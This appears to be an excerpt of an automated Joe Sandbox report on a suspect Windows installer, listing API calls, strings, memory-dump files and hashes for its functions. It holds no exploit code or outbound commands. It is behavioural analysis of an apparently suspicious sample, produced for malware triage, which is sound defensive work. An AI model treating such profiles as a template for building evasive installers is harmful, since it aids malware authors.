                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                                                                • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                                                                • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                                                                • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                                                                • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                                                                • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                                                                • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                                                                • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                                                                • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
                                                                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 00404722
                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                                                                  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                  • Part of subcall function 004062E4: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                                                                  • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                                                                  • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
                                                                                                                                • API String ID: 2624150263-2017731871
                                                                                                                                • Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                                                                • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                                                                • Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                                                                • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                                                                APIs
                                                                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 00402154
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer
                                                                                                                                • API String ID: 542301482-463683323
                                                                                                                                • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                                                                • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: p!C$p!C
                                                                                                                                • API String ID: 0-3125587631
                                                                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                                                                • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                                                                APIs
                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                                                                • GetSysColor.USER32(?), ref: 00404391
                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404434
                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044B3
                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                                                                • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                • String ID: (B@$: Completed$N$open
                                                                                                                                • API String ID: 3615053054-2720870854
                                                                                                                                • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                                                                • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,Windowlet Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F$Windowlet Setup
                                                                                                                                • API String ID: 941294808-3494990132
                                                                                                                                • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                                                                • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                                                                APIs
                                                                                                                                • lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                                                                • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                                                                • wsprintfA.USER32 ref: 00405DF6
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                                                                • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
                                                                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                • API String ID: 222337774-899692902
                                                                                                                                • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                                                                • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                                                                • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                                                                • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406356
